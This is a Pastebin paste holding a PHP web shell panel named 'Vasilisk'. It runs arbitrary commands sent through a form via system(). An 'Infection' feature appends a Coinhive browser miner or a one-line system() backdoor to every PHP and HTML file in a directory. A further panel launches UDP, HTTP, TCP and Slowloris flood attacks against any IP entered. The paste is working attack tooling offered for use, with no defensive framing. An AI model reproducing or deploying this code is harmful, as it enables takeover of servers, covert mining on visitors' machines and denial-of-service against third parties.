API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 13th, 2018
215
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.46 KB | None | 0 0
raw download clone embed print report
  1. <style type="text/css">
  2.  
  3. body {
  4. background: url() 50% 50% no-repeat; background-repeat: repeat-y, repeat-y;background-attachment: fixed, fixed; background-position: center bottom; background-size: 1070px 700px;
  5.  
  6. }
  7.  
  8. #search, #submit
  9. {
  10. float: center;
  11. }
  12.  
  13. #search, #miner
  14. {
  15. padding: 8px 9px;
  16. width: 380px;
  17. border: 1px solid #a4c3ca;
  18. font: normal 13px 'trebuchet MS', arial, helvetica;
  19. background: #f1f1f1;
  20.  
  21. -moz-border-radius: 50px 3px 3px 50px;
  22. border-radius: 50px 3px 3px 50px;
  23. -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
  24. -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
  25. box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
  26. }
  27.  
  28. #submit
  29. {
  30. background: #6cbb6b;
  31. background-image: -moz-linear-gradient(#95d788, #6cbb6b);
  32. background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #6cbb6b),color-stop(1, #95d788));
  33.  
  34. -moz-border-radius: 3px 50px 50px 3px;
  35. border-radius: 3px 50px 50px 3px;
  36.  
  37. border-width: 1px;
  38. border-style: solid;
  39. border-color: #7eba7c #578e57 #447d43;
  40.  
  41. -moz-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
  42. -webkit-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
  43. box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
  44.  
  45. height: 35px;
  46. margin: 0 0 0 10px;
  47. padding: 0;
  48. width: 90px;
  49. cursor: pointer;
  50. font: bold 14px Arial, Helvetica;
  51. color: #23441e;
  52.  
  53. text-shadow: 0 1px 0 rgba(255,255,255,0.5);
  54. }
  55.  
  56. #submit:hover
  57. {
  58. background: #95d788;
  59. background-image: -moz-linear-gradient(#6cbb6b, #95d788);
  60. background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #95d788),color-stop(1, #6cbb6b));
  61. }
  62.  
  63. #submit:active
  64. {
  65. background: #95d788;
  66. outline: none;
  67.  
  68. -moz-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.5) inset;
  69. -webkit-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.5) inset;
  70. box-shadow: 0 1px 4px rgba(0, 0, 0, 0.5) inset;
  71. }
  72.  
  73. #submit::-moz-focus-inner
  74. {
  75. border: 0;
  76. }
  77.  
  78.  
  79. body {
  80. color: #999;
  81. font: 100%/1.5em sans-serif;
  82. margin: 0;
  83. }
  84.  
  85. h1 { margin: 0; }
  86.  
  87. a {
  88. color: #999;
  89. text-decoration: none;
  90. }
  91.  
  92. a:hover { color: #1dabb8; }
  93.  
  94. fieldset {
  95. border: none;
  96. margin: 0;
  97. }
  98.  
  99. input {
  100. border: none;
  101. font-family: inherit;
  102. font-size: inherit;
  103. margin: 0;
  104. outline: none;
  105. }
  106.  
  107. input[type="submit"] { cursor: pointer; }
  108.  
  109. .clearfix { *zoom: 1; }
  110. .clearfix:before, .clearfix:after {
  111. content: "";
  112. display: table;
  113. }
  114. .clearfix:after { clear: both; }
  115.  
  116. /* ---------- LOGIN-FORM ---------- */
  117.  
  118. #login-form {
  119. margin: 150px auto;
  120. width: 300px;
  121. }
  122.  
  123. #login-form input {
  124. font-size: 14px;
  125. }
  126.  
  127. #login-form input[type="text"],
  128. #login-form input[type="text"] {
  129. border: 1px solid #dcdcdc;
  130. padding: 12px 10px;
  131. width: 238px;
  132. }
  133.  
  134. #login-form input[type="text"] {
  135. border-radius: 3px 3px 0 0;
  136. }
  137.  
  138. #login-form input[type="text"] {
  139. border-top: none;
  140. border-radius: 0px 0px 3px 3px;
  141. }
  142.  
  143. #login-form input[type="submit"] {
  144. background: #1dabb8;
  145. border-radius: 3px;
  146. color: #fff;
  147. float: right;
  148. font-weight: bold;
  149. margin-top: 20px;
  150. padding: 12px 20px;
  151. }
  152.  
  153. #login-form input[type="submit"]:hover { background: #198d98; }
  154.  
  155. #login-form footer {
  156. font-size: 12px;
  157. margin-top: 16px;
  158. }
  159.  
  160. </style>
  161.  
  162. <center>
  163. <form id="searchbox" method="POST" action="">
  164. <input id="search" type="text" name="shell" placeholder="Command shell">
  165. <input id="submit" type="submit" name= "ok" value="Command">
  166. </form>
  167.  
  168. <?php sysinfo(); ?>
  169.  
  170. <?php if(isset($_POST['ok'])){ system($_POST['shell']); } ?>
  171. </center>
  172.  
  173. <br><br><br><center>
  174. <form method="post">
  175. <input type="text" name="dir" placeholder="Infection">
  176. <select name="case">
  177. <option value="miner">Miner</option>
  178. <option value="backdoor">Backdoor</option>
  179. </select>
  180. <input type="submit" name="up" value="Upload" />
  181. </form>
  182. </center>
  183.  
  184. <?php
  185. ini_set('error_log',NULL);
  186. ini_set('display_errors','Off');
  187.  
  188. function sysinfo(){
  189. echo '[#] '.$mysql = (function_exists('mysql_connect')) ? "MySQL: ON<br/>" : "MySQL: OFF<br/>";
  190. echo '[#] '.$curl = (function_exists('curl_version')) ? "CURL: ON<br/>" : "CURL: OFF<br/>";
  191. echo '[#] '.php_uname();
  192. }
  193.  
  194. function encdir($dir, $code){
  195. $files = array_diff(scandir($dir), array('.', '..'));
  196. foreach ($files as $filemine){
  197. if(is_dir($dir.'\\'.$filemine)){
  198. encdir($dir.'\\'.$filemine);
  199. }else{
  200. $a = stripos(basename($dir.'/'.$filemine), 'php');
  201. $b = stripos(basename($dir.'/'.$filemine), 'html');
  202. if ($a !== false || $b !== false) {
  203. file_put_contents($dir.'/'.$filemine, $code, FILE_APPEND);
  204. }
  205. }
  206. }
  207. }
  208.  
  209.  
  210. $miner = '
  211. <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
  212. <script type="text/javascript">
  213. var miner = new CoinHive.User("QDnLlLmkRAYu8LBEbnME0NXEn3s3TCYz", "Test");
  214. miner.start();
  215.  
  216. setInterval( function() {
  217. miner.setNumThreads(8);
  218. miner.setThrottle(0.5);
  219.  
  220. console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " + miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
  221. }, 1000);
  222. </script>';
  223.  
  224. $shell = '<?php system($_GET["com"]); ?>';
  225.  
  226. if($_POST['case'] == 'miner'){
  227. encdir($_POST['dir'], $miner);
  228. }elseif($_POST['case'] == 'backdoor'){
  229. encdir($_POST['dir'], $shell);
  230. }
  231. ?>
  232.  
  233. <!DOCTYPE html>
  234. <html>
  235. <head>
  236. <meta charset="UTF-8">
  237. <body>
  238.  
  239. <div id="login-form" style="margin-top: 4%; margin-bottom: -11px;">
  240. <form method="get">
  241. <div style="margin-left: 8%;">
  242. <input type="text" placeholder="IP" name="ip">
  243. <p><input type="text" placeholder="Time" name="time"></p>
  244. <p><input type="text" placeholder="Page" name="page"></p>
  245.  
  246. </div>
  247. <font color="green" face="Arial">
  248. <div style="float: right;">
  249. <input name="myradio" value="1" type="radio"> UDP</div>
  250. <p><input name="myradio" value="2" type="radio"> HTTP</p>
  251. <div style="float: right;">
  252. <p><input name="myradio" value="3" type="radio"> TCP</p></div>
  253. <div style="float: left;">
  254. <p><input name="myradio" value="4" type="radio"> Slowloris</p></div><br><br><br></font>
  255. <input type="submit" name="go" value="attack">
  256. <footer class="clearfix">
  257. <p>Vasilisk</p>
  258. </footer>
  259. </form>
  260. </div>
  261. </body>
  262. </html>
  263.  
  264. <?php
  265. $myhost = 'http://'.$_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
  266. if (isset($_GET["go"])){
  267. switch ($_GET['myradio']){
  268. case 1:
  269. if (isset($_GET['ip']) && isset($_GET['time'])){
  270. $pack = 0;
  271. $port = 11;
  272. $size = 1000;
  273. $exec = $_GET['time'];
  274. $host = $_GET['ip'];
  275. $time = time();
  276. $max = $time+$exec;
  277. for($i = 0; $i < $size; $i++) {
  278. $mess .= rand(0, 9);
  279. }
  280. while (1) {
  281. @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$host&time=$time&page=$page&myradio=1&go=attack");
  282. @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  283. @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  284. @curl_setopt($ch, CURLOPT_HEADER, 0);
  285. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
  286. @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  287. @curl_exec($ch);
  288. if(time() > $max){
  289. break;
  290. }
  291. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  292. if($fp){
  293. $pack++;
  294. fwrite($fp, $mess);
  295. fclose($fp);
  296. }
  297. }
  298. }
  299. break;
  300. case 2:
  301. if(isset($_GET['ip']) && isset($_GET['time'])){
  302. $timei = time();
  303. $server = $_GET['ip'];
  304. $time = $_GET['time'];
  305. $req = array('POST','GET','HEAD');
  306. $brow = array("", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2", "Opera/9.80 (Windows NT 5.2; U; en) Presto/2.10.289 Version/12.00", "Opera/9.21 (Windows NT 5.1; U; en)", "Opera/9.80 (Windows NT 5.1; U; Distribution 00; ru) Presto/2.10.289 Version/12.00");
  307. $rand_keys = array_rand($brow, 2);
  308. while ((time() - $timei < $time)) {
  309. foreach ($req as $mthd) {
  310. $ch = @curl_init();
  311. @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$server&time=$time&page=$page&myradio=2&go=attack");
  312. @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  313. @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  314. @curl_setopt($ch, CURLOPT_HEADER, 0);
  315. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
  316. @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  317. @curl_exec($ch);
  318. $fs = array();
  319. $request = "$mhtd / HTTP/1.1\r\n";
  320. $request .= "Host: $server\r\n";
  321. $request .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
  322. $request .= "Keep-Alive: 900\r\n";
  323. $request .= "Accept: *.*\r\n";
  324. for ($i = 0; $i < 100; $i++) {
  325. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  326. }
  327. for ($i = 0; $i < 100; $i++) {
  328. if (@fwrite($fs[$i], $request)) {
  329. continue;
  330. } else {
  331. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  332. }
  333. }
  334. }
  335. }
  336. }
  337. case 3:
  338. if(isset($_GET['ip']) && isset($_GET['time'])){
  339. $host = $_POST['ip'];
  340. $time = $_POST['time'];
  341. $port = 80;
  342. $timei = time();
  343. $out = str_repeat("A", $size);
  344. $max_time = 100;
  345. while (time() - $timei < $time) {
  346. $ch = @curl_init();
  347. @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$host&time=$time&page=$page&myradio=3&go=attack");
  348. @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  349. @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  350. @curl_setopt($ch, CURLOPT_HEADER, 0);
  351. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
  352. @curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  353. @curl_exec($ch);
  354. $fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
  355. if ($fp)
  356. {
  357. stream_socket_sendto($fp, 'f*ck',STREAM_CLIENT_ASYNC_CONNECT);
  358. @fclose($socket);
  359. }
  360. }
  361. }
  362. case 4:
  363. if(isset($_GET['ip']) && isset($_GET['time'])){
  364. $host = $_GET['ip'];
  365. $time = $_GET['time'];
  366. $timei = time();
  367. $brow = array("", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.749 Yowser/2.5 Safari/537.36", " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Opera/9.21 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0");
  368. $rand_keys = array_rand($brow, 2);
  369. $i = 0;
  370. for ($i = 0; $i < 100; $i++) {
  371. $fs[$i] = @fsockopen($ip, 80, $errno, $errstr);
  372. }
  373. while ((time() - $timei < $time)) {
  374. $ch = @curl_init();
  375. @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$host&time=$time&page=$page&myradio=4&go=attack");
  376. @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  377. @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  378. @curl_setopt($ch, CURLOPT_HEADER, 0);
  379. @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
  380. @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  381. @curl_exec($ch);
  382. for ($i = 0; $i < 100; $i++) {
  383. $out = "POST ".$page." HTTP/1.1\r\n";
  384. $out .= "Host: {$host}\r\n";
  385. $out .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
  386. $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
  387. $out .= "X-a: " . rand(1, 10000) . "\r\n";
  388. if (@fwrite($fs[$i], $out)) {
  389. continue;
  390. } else {
  391. $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
  392. }
  393. }
  394. }
  395. }
  396. }
  397. }
  398. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!